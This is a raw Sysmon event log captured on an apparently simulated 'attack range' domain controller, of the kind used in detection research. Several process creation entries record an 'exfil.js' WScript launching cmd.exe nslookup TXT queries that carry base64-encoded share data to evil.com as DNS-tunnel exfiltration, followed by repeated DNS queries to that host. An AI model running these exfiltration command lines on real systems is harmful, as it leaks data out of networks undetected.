10341000x8000000000000000202095Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.797{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202094Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.797{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202093Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.797{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202092Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.797{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202091Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.797{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C5-629A-1F41-000000005F02}2672C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202090Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.797{2E1864BB-17A1-629A-783D-000000005F02}55528064C:\Windows\System32\WScript.exe{2E1864BB-17C5-629A-1F41-000000005F02}2672C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202089Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.800{2E1864BB-17C5-629A-1F41-000000005F02}2672C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsxexsc.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 22542200x8000000000000000202088Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.645{00000000-0000-0000-0000-000000000000}2652evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000202087Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.524{00000000-0000-0000-0000-000000000000}4624evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000202086Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.414{00000000-0000-0000-0000-000000000000}7236evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000202085Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.321{00000000-0000-0000-0000-000000000000}1700evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000202084Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.191{00000000-0000-0000-0000-000000000000}4484evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000202083Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.079{00000000-0000-0000-0000-000000000000}5232evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000202082Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.956{00000000-0000-0000-0000-000000000000}7416evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000202081Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.830{00000000-0000-0000-0000-000000000000}4188evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000202080Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.749{00000000-0000-0000-0000-000000000000}5416evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000202079Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.647{00000000-0000-0000-0000-000000000000}6396evil.com0::ffff:127.0.0.1;<unknown process> 23542300x8000000000000000202078Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.782{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlakdaje.tmpMD5=74AA98EC4B1C82029578D90E2343E510,SHA256=BCED258190799681E04DEC80A23A2247E8F332523DBBC8B2CBECAB9A40B2F90E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000202077Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.766{2E1864BB-17C5-629A-1D41-000000005F02}25687644C:\Windows\system32\conhost.exe{2E1864BB-17C5-629A-1E41-000000005F02}4712C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202076Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.750{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202075Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.750{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202074Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.750{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202073Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.750{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202072Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.750{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C5-629A-1E41-000000005F02}4712C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202071Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.750{2E1864BB-17C5-629A-1C41-000000005F02}61085696C:\Windows\system32\cmd.exe{2E1864BB-17C5-629A-1E41-000000005F02}4712C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202070Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.763{2E1864BB-17C5-629A-1E41-000000005F02}4712C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C5-629A-1C41-000000005F02}6108C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlakdaje.tmp 2>&1 10341000x8000000000000000202069Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.735{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C5-629A-1D41-000000005F02}2568C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202068Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.735{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C5-629A-1D41-000000005F02}2568C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202067Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.735{2E1864BB-17C5-629A-1D41-000000005F02}25687644C:\Windows\system32\conhost.exe{2E1864BB-17C5-629A-1C41-000000005F02}6108C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202066Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.712{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C5-629A-1D41-000000005F02}2568C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202065Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.712{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202064Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.712{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202063Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.712{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202062Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.712{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202061Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.712{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C5-629A-1C41-000000005F02}6108C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202060Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.712{2E1864BB-17A1-629A-783D-000000005F02}55523504C:\Windows\System32\WScript.exe{2E1864BB-17C5-629A-1C41-000000005F02}6108C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202059Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.717{2E1864BB-17C5-629A-1C41-000000005F02}6108C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlakdaje.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000202058Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.712{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlakis.tmpMD5=C7EBA965EA2938C9D738B256A5573F35,SHA256=722A438985A6A7CB05BECB0E5BC6B8755AA777F6146D0E8D8A702198A5DDD2AF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000202057Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 